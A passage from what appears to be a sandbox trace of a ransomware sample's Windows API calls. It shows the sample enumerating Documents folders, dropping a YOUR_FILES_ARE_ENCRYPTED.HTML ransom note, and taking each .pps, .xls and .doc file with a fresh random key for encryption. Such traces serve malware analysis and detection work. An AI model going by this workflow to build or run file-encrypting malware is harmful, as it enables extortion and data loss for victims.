"c:\\users\\rdhj0cnfevzx\\documents\\6d2j8wrsz4uysx4ge\\k68ziv\\yv-yjymmwnm1ayaytg1\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0124.281] WriteFile (in: hFile=0x31c, lpBuffer=0x3155038*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3155038*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0124.282] CloseHandle (hObject=0x31c) returned 1 [0124.282] GetProcessHeap () returned 0x600000 [0124.282] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3155038 | out: hHeap=0x600000) returned 1 [0124.282] GetProcessHeap () returned 0x600000 [0124.282] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0124.282] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x481e3c00, ftCreationTime.dwHighDateTime=0x1d6fa35, ftLastAccessTime.dwLowDateTime=0x3d8ae190, ftLastAccessTime.dwHighDateTime=0x1d70029, ftLastWriteTime.dwLowDateTime=0x3d8ae190, ftLastWriteTime.dwHighDateTime=0x1d70029, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ecfc, dwReserved1=0x62ec90, cFileName="yV-YjYmMWnm1AyayTG1", cAlternateFileName="YV-YJY~1")) returned 0 [0124.282] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0124.282] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0124.282] GetProcessHeap () returned 0x600000 [0124.282] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3155038 [0124.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\6d2j8wrsz4uysx4ge\\k68ziv\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0124.283] WriteFile (in: hFile=0x328, lpBuffer=0x3155038*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3155038*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0124.284] CloseHandle (hObject=0x328) returned 1 [0124.284] GetProcessHeap () returned 0x600000 [0124.284] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3155038 | out: hHeap=0x600000) returned 1 [0124.284] GetProcessHeap () returned 0x600000 [0124.284] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0124.284] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe0b7f60, ftCreationTime.dwHighDateTime=0x1d70312, ftLastAccessTime.dwLowDateTime=0x17a4cbb0, ftLastAccessTime.dwHighDateTime=0x1d70544, ftLastWriteTime.dwLowDateTime=0x17a4cbb0, ftLastWriteTime.dwHighDateTime=0x1d70544, nFileSizeHigh=0x0, nFileSizeLow=0x2d81, dwReserved0=0x19ec60, dwReserved1=0xfe939c6d, cFileName="m0f0BZ1iiz4gB6s.pps", cAlternateFileName="M0F0BZ~1.PPS")) returned 1 [0124.284] StrStrIW (lpFirst="m0f0BZ1iiz4gB6s.pps", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.284] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\m0f0BZ1iiz4gB6s.pps") returned 73 [0124.284] PathFindExtensionW (pszPath="m0f0BZ1iiz4gB6s.pps") returned=".pps" [0124.284] lstrlenW (lpString=".pps") returned 4 [0124.284] PathFindExtensionW (pszPath="m0f0BZ1iiz4gB6s.pps") returned=".pps" [0124.284] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0124.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\m0f0BZ1iiz4gB6s.pps" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\6d2j8wrsz4uysx4ge\\m0f0bz1iiz4gb6s.pps"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0124.286] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=11649) returned 1 [0124.286] GetProcessHeap () returned 0x600000 [0124.286] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0124.288] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="8C") returned 2 [0124.288] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="6F") returned 2 [0124.289] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="0F") returned 2 [0124.289] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="81") returned 2 [0124.289] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="1A") returned 2 [0124.289] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="70") returned 2 [0124.289] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="3E") returned 2 [0124.289] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="B7") returned 2 [0124.289] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="1E") returned 2 [0124.289] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="79") returned 2 [0124.289] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="1C") returned 2 [0124.289] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="3D") returned 2 [0124.289] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="41") returned 2 [0124.289] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="A3") returned 2 [0124.289] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="8C") returned 2 [0124.289] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="12") returned 2 [0124.289] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="1B") returned 2 [0124.289] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="1F") returned 2 [0124.289] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="CE") returned 2 [0124.289] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="EF") returned 2 [0124.289] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="7A") returned 2 [0124.289] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="3F") returned 2 [0124.289] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="CA") returned 2 [0124.289] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="30") returned 2 [0124.289] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="2F") returned 2 [0124.289] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="FC") returned 2 [0124.289] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="9C") returned 2 [0124.289] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="72") returned 2 [0124.289] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="ED") returned 2 [0124.289] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="1E") returned 2 [0124.289] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="52") returned 2 [0124.289] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="4E") returned 2 [0124.290] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\m0f0BZ1iiz4gB6s.pps" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\m0f0BZ1iiz4gB6s.pps") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\m0f0BZ1iiz4gB6s.pps" [0124.290] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.290] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0124.293] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcde5670, ftCreationTime.dwHighDateTime=0x1d7071e, ftLastAccessTime.dwLowDateTime=0xd8895ff0, ftLastAccessTime.dwHighDateTime=0x1d70934, ftLastWriteTime.dwLowDateTime=0xd8895ff0, ftLastWriteTime.dwHighDateTime=0x1d70934, nFileSizeHigh=0x0, nFileSizeLow=0x152d7, dwReserved0=0x19ec60, dwReserved1=0xfe939c6d, cFileName="oCsUy6dVcCTaFQew.pps", cAlternateFileName="OCSUY6~1.PPS")) returned 1 [0124.293] StrStrIW (lpFirst="oCsUy6dVcCTaFQew.pps", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.293] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\oCsUy6dVcCTaFQew.pps") returned 74 [0124.293] PathFindExtensionW (pszPath="oCsUy6dVcCTaFQew.pps") returned=".pps" [0124.293] lstrlenW (lpString=".pps") returned 4 [0124.293] PathFindExtensionW (pszPath="oCsUy6dVcCTaFQew.pps") returned=".pps" [0124.293] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0124.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\oCsUy6dVcCTaFQew.pps" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\6d2j8wrsz4uysx4ge\\ocsuy6dvcctafqew.pps"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0124.294] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=86743) returned 1 [0124.294] GetProcessHeap () returned 0x600000 [0124.294] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0124.295] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="29") returned 2 [0124.295] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="8D") returned 2 [0124.295] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="D1") returned 2 [0124.295] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="2E") returned 2 [0124.295] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="65") returned 2 [0124.295] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="B2") returned 2 [0124.295] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="0B") returned 2 [0124.295] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="3B") returned 2 [0124.295] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="FF") returned 2 [0124.295] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="3C") returned 2 [0124.295] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="4E") returned 2 [0124.295] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="C7") returned 2 [0124.295] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="98") returned 2 [0124.295] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="C6") returned 2 [0124.295] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="53") returned 2 [0124.295] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="B5") returned 2 [0124.295] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="54") returned 2 [0124.295] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="A7") returned 2 [0124.295] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="31") returned 2 [0124.295] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="4F") returned 2 [0124.295] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="1C") returned 2 [0124.295] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="63") returned 2 [0124.295] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="24") returned 2 [0124.295] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="1C") returned 2 [0124.295] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="F9") returned 2 [0124.295] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="A0") returned 2 [0124.295] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="49") returned 2 [0124.295] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="F1") returned 2 [0124.295] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="85") returned 2 [0124.295] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="7E") returned 2 [0124.295] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="38") returned 2 [0124.295] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="7A") returned 2 [0124.296] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\oCsUy6dVcCTaFQew.pps" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\oCsUy6dVcCTaFQew.pps") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\oCsUy6dVcCTaFQew.pps" [0124.296] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.296] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0124.301] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b9e3ae0, ftCreationTime.dwHighDateTime=0x1d709ee, ftLastAccessTime.dwLowDateTime=0xad6f27a0, ftLastAccessTime.dwHighDateTime=0x1d70a0b, ftLastWriteTime.dwLowDateTime=0xad6f27a0, ftLastWriteTime.dwHighDateTime=0x1d70a0b, nFileSizeHigh=0x0, nFileSizeLow=0x1e33, dwReserved0=0x19ec60, dwReserved1=0xfe939c6d, cFileName="XRSgD.xls", cAlternateFileName="")) returned 1 [0124.301] StrStrIW (lpFirst="XRSgD.xls", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.301] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\XRSgD.xls") returned 63 [0124.301] PathFindExtensionW (pszPath="XRSgD.xls") returned=".xls" [0124.301] lstrlenW (lpString=".xls") returned 4 [0124.301] PathFindExtensionW (pszPath="XRSgD.xls") returned=".xls" [0124.301] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0124.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\XRSgD.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\6d2j8wrsz4uysx4ge\\xrsgd.xls"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0124.302] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=7731) returned 1 [0124.302] GetProcessHeap () returned 0x600000 [0124.302] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0124.303] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="07") returned 2 [0124.303] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="72") returned 2 [0124.303] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="3A") returned 2 [0124.303] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="6F") returned 2 [0124.303] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="B5") returned 2 [0124.303] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="BA") returned 2 [0124.303] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="AC") returned 2 [0124.303] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="49") returned 2 [0124.303] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="64") returned 2 [0124.303] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="88") returned 2 [0124.303] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="0B") returned 2 [0124.303] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="75") returned 2 [0124.303] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="6B") returned 2 [0124.303] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="6D") returned 2 [0124.303] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="E3") returned 2 [0124.303] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="66") returned 2 [0124.303] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="42") returned 2 [0124.303] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="B4") returned 2 [0124.304] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="C7") returned 2 [0124.304] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="2E") returned 2 [0124.304] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="B8") returned 2 [0124.304] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="7D") returned 2 [0124.304] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="76") returned 2 [0124.304] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="0E") returned 2 [0124.304] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="69") returned 2 [0124.304] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="3B") returned 2 [0124.304] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="74") returned 2 [0124.304] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="0F") returned 2 [0124.304] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="74") returned 2 [0124.304] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="14") returned 2 [0124.304] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="60") returned 2 [0124.304] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="56") returned 2 [0124.305] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\XRSgD.xls" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\XRSgD.xls") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\XRSgD.xls" [0124.305] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.305] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0124.309] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e658d0, ftCreationTime.dwHighDateTime=0x1d7004c, ftLastAccessTime.dwLowDateTime=0xf2ef8f0, ftLastAccessTime.dwHighDateTime=0x1d70307, ftLastWriteTime.dwLowDateTime=0xf2ef8f0, ftLastWriteTime.dwHighDateTime=0x1d70307, nFileSizeHigh=0x0, nFileSizeLow=0x1770f, dwReserved0=0x19ec60, dwReserved1=0xfe939c6d, cFileName="XvX6.doc", cAlternateFileName="")) returned 1 [0124.309] StrStrIW (lpFirst="XvX6.doc", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.309] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\XvX6.doc") returned 62 [0124.309] PathFindExtensionW (pszPath="XvX6.doc") returned=".doc" [0124.309] lstrlenW (lpString=".doc") returned 4 [0124.309] PathFindExtensionW (pszPath="XvX6.doc") returned=".doc" [0124.309] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0124.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\XvX6.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\6d2j8wrsz4uysx4ge\\xvx6.doc"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0124.310] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=96015) returned 1 [0124.310] GetProcessHeap () returned 0x600000 [0124.310] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0124.311] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="B5") returned 2 [0124.311] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="B0") returned 2 [0124.311] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="3B") returned 2 [0124.311] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="2F") returned 2 [0124.311] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="0D") returned 2 [0124.311] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="37") returned 2 [0124.311] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="11") returned 2 [0124.311] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="85") returned 2 [0124.311] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="00") returned 2 [0124.311] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="E2") returned 2 [0124.311] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="25") returned 2 [0124.311] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="39") returned 2 [0124.311] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="2B") returned 2 [0124.311] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="5F") returned 2 [0124.311] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="0A") returned 2 [0124.311] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="31") returned 2 [0124.311] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="5C") returned 2 [0124.311] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="E2") returned 2 [0124.311] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="9B") returned 2 [0124.311] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="F7") returned 2 [0124.311] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="D1") returned 2 [0124.311] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="9D") returned 2 [0124.311] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="3C") returned 2 [0124.311] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="E0") returned 2 [0124.311] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="E7") returned 2 [0124.312] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="4C") returned 2 [0124.312] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="0A") returned 2 [0124.312] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="AD") returned 2 [0124.312] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="10") returned 2 [0124.312] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="44") returned 2 [0124.312] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="2C") returned 2 [0124.312] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="06") returned 2 [0124.312] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\XvX6.doc" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\XvX6.doc") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\XvX6.doc" [0124.312] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.312] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0124.315] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e658d0, ftCreationTime.dwHighDateTime=0x1d7004c, ftLastAccessTime.dwLowDateTime=0xf2ef8f0, ftLastAccessTime.dwHighDateTime=0x1d70307, ftLastWriteTime.dwLowDateTime=0xf2ef8f0, ftLastWriteTime.dwHighDateTime=0x1d70307, nFileSizeHigh=0x0, nFileSizeLow=0x1770f, dwReserved0=0x19ec60, dwReserved1=0xfe939c6d, cFileName="XvX6.doc", cAlternateFileName="")) returned 0 [0124.315] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0124.315] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 83 [0124.315] GetProcessHeap () returned 0x600000 [0124.316] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3155038 [0124.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\6d2j8wrsz4uysx4ge\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0124.316] WriteFile (in: 